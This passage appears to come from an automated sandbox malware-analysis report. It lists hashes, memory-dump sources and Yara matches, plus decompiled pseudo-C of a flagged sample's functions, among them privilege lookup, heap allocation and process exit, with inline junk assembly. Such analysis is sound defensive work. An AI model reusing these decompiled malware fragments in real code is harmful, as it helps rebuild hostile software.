                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                                              			E00418631(void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                                                                              				intOrPtr* _t13;
                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                              				int _t19;
                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                              				short* _t29;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				asm("pushad");
                                                                                                                                                                                                              				asm("fprem1");
                                                                                                                                                                                                              				if(__eflags > 0) {
                                                                                                                                                                                                              					_t12 = _a8;
                                                                                                                                                                                                              					_t29 =  &(_a8[0x648]);
                                                                                                                                                                                                              					_t13 = E00418DD0(_a8, _t29,  *((intOrPtr*)(_t12 + 0xa18)), 0, 0x47);
                                                                                                                                                                                                              					es = _t28;
                                                                                                                                                                                                              					 *_t13 =  *_t13 + _t13;
                                                                                                                                                                                                              					__eflags =  *_t13;
                                                                                                                                                                                                              					return  *( *_t29)(_a12, _a16);
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					asm("adc [ebp+0x55cef185], bh");
                                                                                                                                                                                                              					_t16 = _a4;
                                                                                                                                                                                                              					_t17 = E00418DD0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_t16 + 0xa18)), 0, 0x46);
                                                                                                                                                                                                              					es = _t28;
                                                                                                                                                                                                              					 *_t17 =  *_t17 + _t17;
                                                                                                                                                                                                              					_t19 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                                                                              					return _t19;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}








                                                                                                                                                                                                              0x00418631
                                                                                                                                                                                                              0x00418632
                                                                                                                                                                                                              0x00418639
                                                                                                                                                                                                              0x00418683
                                                                                                                                                                                                              0x00418692
                                                                                                                                                                                                              0x0041869a
                                                                                                                                                                                                              0x0041869c
                                                                                                                                                                                                              0x0041869d
                                                                                                                                                                                                              0x0041869d
                                                                                                                                                                                                              0x004186b0
                                                                                                                                                                                                              0x0041863b
                                                                                                                                                                                                              0x0041863b
                                                                                                                                                                                                              0x00418643
                                                                                                                                                                                                              0x0041865a
                                                                                                                                                                                                              0x0041865c
                                                                                                                                                                                                              0x0041865d
                                                                                                                                                                                                              0x00418670
                                                                                                                                                                                                              0x00418674
                                                                                                                                                                                                              0x00418674

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                                                                                                              • String ID: fD
                                                                                                                                                                                                              • API String ID: 3899507212-1726987543
                                                                                                                                                                                                              • Opcode ID: 95bd7005f295af02f30576c5e001f3f8be2965bb9ae36b237821c90f00f0195c
                                                                                                                                                                                                              • Instruction ID: 0bb6830434fc7ec2cd546057dbc060a0a4ef7db3b92bfc25964a6649bf193a0e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95bd7005f295af02f30576c5e001f3f8be2965bb9ae36b237821c90f00f0195c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E30171B1600308ABDB10DF54CC45EEB3798EF89354F058169BE0C6B282D934E81087E5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				E00418DD0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                                                                              				_t6 =  &_a8; // 0x413526
                                                                                                                                                                                                              				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                                                                                                                                                                              				return _t10;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x004184b7
                                                                                                                                                                                                              0x004184c2
                                                                                                                                                                                                              0x004184cd
                                                                                                                                                                                                              0x004184d1

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID: &5A
                                                                                                                                                                                                              • API String ID: 1279760036-1617645808
                                                                                                                                                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                              • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                              			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                                                                              				char _v67;
                                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                              				intOrPtr* _t13;
                                                                                                                                                                                                              				int _t14;
                                                                                                                                                                                                              				long _t21;
                                                                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_v68 = 0;
                                                                                                                                                                                                              				E00419D30( &_v67, 0, 0x3f);
                                                                                                                                                                                                              				E0041A910( &_v68, 3);
                                                                                                                                                                                                              				_t12 = E00409B30(_a4 + 0x1c,  &_v68); // executed
                                                                                                                                                                                                              				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                                                                                                              				_t25 = _t13;
                                                                                                                                                                                                              				if(_t25 != 0) {
                                                                                                                                                                                                              					_t21 = _a8;
                                                                                                                                                                                                              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                                                                                                                                              					_t32 = _t14;
                                                                                                                                                                                                              					if(_t14 == 0) {
                                                                                                                                                                                                              						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					return _t14;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t13;
                                                                                                                                                                                                              			}











                                                                                                                                                                                                              0x0040727f
                                                                                                                                                                                                              0x00407283
                                                                                                                                                                                                              0x0040728e
                                                                                                                                                                                                              0x0040729e
                                                                                                                                                                                                              0x004072ae
                                                                                                                                                                                                              0x004072b3
                                                                                                                                                                                                              0x004072ba
                                                                                                                                                                                                              0x004072bd
                                                                                                                                                                                                              0x004072ca
                                                                                                                                                                                                              0x004072cc
                                                                                                                                                                                                              0x004072ce
                                                                                                                                                                                                              0x004072eb
                                                                                                                                                                                                              0x004072eb
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004072ed
                                                                                                                                                                                                              0x004072f2

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1836367815-0
                                                                                                                                                                                                              • Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                                                                              • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 02b5c3f9e2adb3cf7a1222feca9d33d709659fbcfcf389e82e4fcbfb9bed17a5
                                                                                                                                                                                                              • Instruction ID: 9726e7260dd74bb6b16136358a0aaf202e033f0b340cd415b03e84c49f9e44df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02b5c3f9e2adb3cf7a1222feca9d33d709659fbcfcf389e82e4fcbfb9bed17a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6F0B4752402146FC700EF98DC85DEB77A8DF85660B04866EF94C8B343C631E91587F4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                                                                              			E004184D7(void* __eflags) {
                                                                                                                                                                                                              				char _t10;
                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				asm("repne sbb bh, [ss:ebx+esi*8]");
                                                                                                                                                                                                              				asm("cmpsd");
                                                                                                                                                                                                              				if(__eflags < 0) {
                                                                                                                                                                                                              					asm("outsb");
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t19 = _t21;
                                                                                                                                                                                                              				_t7 =  *((intOrPtr*)(_t19 + 8));
                                                                                                                                                                                                              				_t3 = _t7 + 0xc74; // 0xc74
                                                                                                                                                                                                              				E00418DD0( *((intOrPtr*)(_t19 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t19 + 8)) + 0x10)), 0, 0x35);
                                                                                                                                                                                                              				_t10 = RtlFreeHeap( *(_t19 + 0xc),  *(_t19 + 0x10),  *(_t19 + 0x14)); // executed
                                                                                                                                                                                                              				return _t10;
                                                                                                                                                                                                              			}






                                                                                                                                                                                                              0x004184d7
                                                                                                                                                                                                              0x004184dc
                                                                                                                                                                                                              0x004184dd
                                                                                                                                                                                                              0x004184df
                                                                                                                                                                                                              0x004184e0
                                                                                                                                                                                                              0x004184e1
                                                                                                                                                                                                              0x004184e3
                                                                                                                                                                                                              0x004184ef
                                                                                                                                                                                                              0x004184f7
                                                                                                                                                                                                              0x0041850d
                                                                                                                                                                                                              0x00418511

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                              • Opcode ID: ce7af58f0eff4809f2337f2327770fdf5a0e48006cf776dfda1a91cc6b2bf7be
                                                                                                                                                                                                              • Instruction ID: c0974e9923ed0754cdf381274787b384ea7dbbc0c0386a0808341c4ba8dfa37c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce7af58f0eff4809f2337f2327770fdf5a0e48006cf776dfda1a91cc6b2bf7be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93E092712002046FCB14DF55DD45EE73B69AF84350F004689FD0957252CA30ED00CAA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                                                                              				char _t10;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t7 = _a4;
                                                                                                                                                                                                              				_t3 = _t7 + 0xc74; // 0xc74
                                                                                                                                                                                                              				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                                                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                                                              				return _t10;
                                                                                                                                                                                                              			}




                                                                                                                                                                                                              0x004184e3
                                                                                                                                                                                                              0x004184ef
                                                                                                                                                                                                              0x004184f7
                                                                                                                                                                                                              0x0041850d
                                                                                                                                                                                                              0x00418511

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                              • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                              			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                                                                              				intOrPtr* _t8;
                                                                                                                                                                                                              				int _t10;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t8 = E00418DD0(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                                                                                                              				_pop(es);
                                                                                                                                                                                                              				 *_t8 =  *_t8 + _t8;
                                                                                                                                                                                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                                                                              				return _t10;
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x0041865a
                                                                                                                                                                                                              0x0041865c
                                                                                                                                                                                                              0x0041865d
                                                                                                                                                                                                              0x00418670
                                                                                                                                                                                                              0x00418674

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3899507212-0
                                                                                                                                                                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                              • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 21%
                                                                                                                                                                                                              			E00418512() {
                                                                                                                                                                                                              				int _v0;
                                                                                                                                                                                                              				intOrPtr _v4;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_push(cs);
                                                                                                                                                                                                              				asm("hlt");
                                                                                                                                                                                                              				asm("cmpsb");
                                                                                                                                                                                                              				asm("sbb eax, 0x21c4c534");
                                                                                                                                                                                                              				asm("stosb");
                                                                                                                                                                                                              				_t7 = _v4;
                                                                                                                                                                                                              				E00418DD0(_v4, _v4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
                                                                                                                                                                                                              				ExitProcess(_v0);
                                                                                                                                                                                                              			}





                                                                                                                                                                                                              0x00418512
                                                                                                                                                                                                              0x00418513
                                                                                                                                                                                                              0x00418514
                                                                                                                                                                                                              0x00418516
                                                                                                                                                                                                              0x0041851c
                                                                                                                                                                                                              0x00418523
                                                                                                                                                                                                              0x0041853a
                                                                                                                                                                                                              0x00418548

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418548
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                                              • Opcode ID: 14be6150ccd3c246197924817771b9af2cd74ec9635346062af11bf9865ae55b
                                                                                                                                                                                                              • Instruction ID: 5ffb13beb6cd9ab14792caa9d08a0ef1702782da78f4c0065d31d866f6d3d5dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14be6150ccd3c246197924817771b9af2cd74ec9635346062af11bf9865ae55b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBE0867961110476E720EF64CCC5FD73B5C9F49350F058558B9585B682C530A90487A0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00418520(intOrPtr _a4, int _a8) {
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t5 = _a4;
                                                                                                                                                                                                              				E00418DD0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                                                                                              				ExitProcess(_a8);
                                                                                                                                                                                                              			}



                                                                                                                                                                                                              0x00418523
                                                                                                                                                                                                              0x0041853a
                                                                                                                                                                                                              0x00418548

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418548
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
